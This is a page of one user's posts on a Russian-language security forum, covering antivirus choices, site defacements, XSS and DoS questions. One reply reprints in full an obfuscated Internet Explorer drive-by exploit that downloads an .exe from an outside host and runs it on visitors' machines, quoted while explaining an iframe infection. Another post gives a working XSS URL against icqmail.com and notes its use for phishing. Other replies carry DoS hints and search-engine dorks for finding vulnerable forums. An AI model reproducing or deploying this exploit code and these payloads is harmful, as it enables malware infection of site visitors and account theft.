Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Выбрать дату в календареВыбрать дату в календаре

Страницы: Пред. 1 ... 11 12 13 14 15 16 17 18 19 20 21 ... 45 След.
Думай или сиди
 
такое ощущение, что автор позавчера узнал о СОРМе, и решил поделиться не забывать о нём даже в корпоративной среде.
XSS ICQ.COM, тырим ацки
 
если вы думаете, что единственным вектором нападения является кража куки - вы глубоко заблуждаетесь.
DOS Атака
 
так или иначе назвать методы - всёравно, что слепому продиктовать команды в консоли.
изучи сетевые протоколы детально, разбирись, что такое SYN флаг, ICMP пинг и так далее, их функциональный потенциал. Если не вдаваться в подробности, один из наиболее распространённых видов атак на отказ в обслуживании - автоматизация.генерация подобных вещей на целевой ресурс.

Порой, можно обойтись стандартными вещами, например Apache abt :)
Microsoft ищет пиратский софт в Воронеже
 
интересно, почему не в деревне зажопинск.
взлом сайтов, вставка iframe на eburgertry.info с вирусом, Взлом ряд сайтов с разных хостингов с iframe ссылкой на вирус
 
Изучайте логи, если это shared hosting - могут быть огрехи с правами, взломав один сайт через обычную скриптовую уязвимость злоумышленник может лазить по каталогам других пользователей. задумайтесь о багах open dir, правах доступа, бажности ПО на сервере.
помогите взломать сервер
 
нет смысл использовать его, когда существуют вполне достойные фриварные решения - NMAP.
(работа с SSL пристуствует :)).
Пачему убрали "рейтинг" ?
 
Цитата
С одной стороны это хорошо - видно кто действительно "эксперт". А с другой - слушать советы того, кто набивает себе рейтинг на темах "Давайте лучше посмеемся С улыбкой" не особо приятно. На cracklab.ru решили этот вопрос так: просто перестали добавлять рейтинг с определенных тем . Ну а на supertrubka.ru там, имхо, ещё лучше сделали. Тем кто дал правильный ответ на вопрос или чем-то помог добавляют "+" (плюс(ы)), это там и подразумевается "рейтинг", а тем кто просто флудит добавляют только кол-во постов.


Полностью согласен с вами. Хотя я не столь активный любитель форумов, крайне близка идея с форума Античат и вами названных.
взлом сайтов, вставка iframe на eburgertry.info с вирусом, Взлом ряд сайтов с разных хостингов с iframe ссылкой на вирус
 
Сергей, действие, связанное со вставкой IFRAME прежде всего указывает на:
- несанкционированный доступ
- "трафик"
Злоумышленник размещает код эксплоита под опр.вид ПО, в этом случае - IE:

Код
<script type="text/javascript" language="JavaScript">

function iii() { return true; }

var uri = 'http://seznamse.xf.cz/dokumenty/flashmyadmin/1.exe';
window.onerror = iii;

var za = 'ting.FileS';
var z = 'plication';
var shellapp = 'Shell.Ap'+z;
var z01 = "r%20%3D%20o.Creat'+'eObject%'+'28n%29";
var z02 = "r%20%3D%20o.Creat'+'eObject%28n%'+'2C%20%22%22%29";
var z03 = "r%20%3D%20o.Create'+'Object%28n%2C'+'%20%22%22%2C%20%22%22%29";
var z04 = "r%20%3D%20o.GetOb'+'ject%28%'+'22%22%2C%20n%29";
var z05 = "r%20%3D%20o.GetObject%28n%'+'2C%20%22%22%29";
var z06 = "r%20%3D%2'+'0o.GetObject%28n%29";
var us = 'soft.XMLHTTP';
var a1 = 'ADO';
var a2 = 'DB.';
var a3 = 'Str';
var a4 = 'eam';
var us4 = 'tofile(fname1,2);';
var s0s = "me1,'','','open',0);";
var s1s = "Q.She";

function rname() {
   var cz01 = "OPQRSTUVWXTZabcdefghiklmnopq";
   var chars = "0123456789ABCDEFGHIJKLMN"+cz01+"rstuvwxyz";
   var string_length = 8;
   var randomstring = '';
   for (var i=0; i<string_length; i++) {
      var rnum = Math.floor(Math.random() * chars.length);
      randomstring += chars.substring(rnum,rnum+1);
   }

   return randomstring + '.exe';
}

function DoIt() 

{ 
   var us2 = 'e1 = f.BuildPath(tmp';

   x.Open('GET',uri,false);
   x.Send();
   var fname1 = rname();
   var f = xml.CreateObject('Scrip'+za+'ystemObject','');

   var tmp = f.GetSpecialFolder(2);

   eval('fnam'+us2+',fname1);');

   S.open();
   S.write(x.responseBody);
   eval('S.save'+us4);
   S.close();
   
   var Q = xml.createobject(shellapp,'');
   eval (s1s+"llExecute(fna"+s0s);
   document.writeln(uri+'<br>'+fname1+'<br>');
}

</script>
</head>
<body>
<script type="text/javascript" language="JavaScript">

if (navigator.userAgent.indexOf('MSIE') != -1) { // if internet explorer ... (RDS Exploit)

   var xml = document.createElement('object');

   var zu = 'BD96C556-65A3-';
   var ko = '11D0-983A-00C04FC29E36';

   guid = zu + ko;
   xml.setAttribute('classid','clsid:'+guid);
   n_xml = 'Micro'+us;
   var x = xml.CreateObject(n_xml,"");

   str1 = a1 + a2;
   str1 = str1 + a3 + a4;
   str5 = str1;
   var S = xml.CreateObject(str5,"");
   S.type = 1;
   str6 = 'GET';
   DoIt();
}
</script> 


после открытия страницы код исполняется и автоматически исполняет http://seznamse.xf.cz/dokumenty/flashmyadmin/1.exe удалённо, тем самым заражая всех посетителей с бажным софтом.

Цитата
в которых вставка iframe была не успешной и код на странице воспринимался как обычный текст,

либо не были выставлены соответсвующие права доступа (chmods), либо открытие вредоносной странице было произведено с Firefox, opera и т.п.
IDScenter v1.1 rc4
 
Цитата
Чего то не прет пока
буду искать что такое Winpcap

Библиотека захвата + мини-драйвер протокола с собственным API
Что лучше? НОД32 или Касперский?
 
2[53x]Shadow : два из них я вам перечислил.
XSS ICQ.COM, тырим ацки
 
Код
http://icqmail.com/resellercenter/login.asp?Err=3&Usr=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert('skvoz')%3B%3C/ScRiPt%3E


XSS на стороннем ресурсе.

Сказать прямо воспользовавшись подобными XSS для фишинга, можно добиться неплохих результатов, к примеру:



White List [s1b], вайт на мну
 
По крайней мере Securitylab - ресурс, который за всё это время не потерял моего уважения, хотя бы в чёткой направленности и компетентности. Вы знаете, как правило лично для меня Whitelist нихера не значит, т.к. как правило люди его создаваемые сделали сделки не больше ICQ, разовых троевых, крипторов, либо пиженного "приватного софта". Да даже действительно проверенные люди с VN , мазы не нуждаются в подобных вещах, если они действительно имеют право называться "проверенными".


Цитата
2. Я пытаюсь создать новую традицию - писать вайты на хороших (я надеюсь) людей.

Никакой новой традиции здесь нет, скорее и из этого форума будет сделано ещё одно подобие зоны для школьников. Существует определённая этика в сети, о которой наверное знают люди чуть старой школы, либо имеющие какие-либо нравственные соображения. Я говорю к тому, что просить писать вайт - не то, чтобы нереспектабельно, а скорее - презрительно. Особенно порадывало:

Цитата
Народ! Просьба ко всем кто-меня (s1b aka Furius Angel) знает - отписать мнение обо мне. Этакий вайт лист. Просто хотел бы иметь вайт на секлабе, ибо на нём я уже больше года... Так что если я кому-то чем-то помог, что-то Вам подсказал, совершал с Вами сделки - прошу.

отписал сам же Furius Angel  :)

Вообще когда речь о компетентности каких-либо действий или изречений, важно помнить, что кроме вашей оценки, существует ещё абсолютно посторонний взгляд со стороны, который внимательно смотрит и заставляет улыбаться.
Phpbb 2.0.13
 
Кури форум античата в соотвествующем разделе.
Подробнее он имеет ввиду - СИ и пассграбинг троянами.
XSS ICQ.COM, тырим ацки
 
пива выпить и начать домогаться флудом.
следи за собственной безопасностью в будущем - устанавливай сложные пароли, установи антивирус и файервол, настрой безопасность ОС, и спи спокойно.
Хак
 
Это сторонний сайт , использующий абсолютно другой механизм поиска.
Что лучше? НОД32 или Касперский?
 
Для начала осознайте повод использовать коммерческие продукты вместо фриварных (Antivir, Spybot и т.п.).
Круглый стол «Хакеры в России» (Госдума РФ, 18 января 2006 года)
 
Недавно посетил концерт Яна Арлазорова, но чувствуется смеха на данном мероприятии будет куда больше.
Шпионское агентство США принимала участие в разработке защитных механи
 
Между прочем на сайте NSA есть так называемые документации, посвящёнными некоторым аспектам безопасности известных систем (Windows тоже:) ) от самих шпиёнов;
Бажные форумы, хелп
 
кури гуглхакерские запросы: inurl:, intitlle:
Хак
 
Цитата
Мдя...довольно интересный баг...  

Вы шутите?) Где вы его увидели? То, что FBI заведомо:
- избегает дефектов при осуществлении поисковых запросов (XSS к примеру) и сваливает всё на гугл - наоброт только плюс
- конкретизирует поисковых траффик, произведённый с офсайта ФБР (вспомните базу логов поисковых запросов с AOL :) )

Учи мат часть :D
Страницы: Пред. 1 ... 11 12 13 14 15 16 17 18 19 20 21 ... 45 След.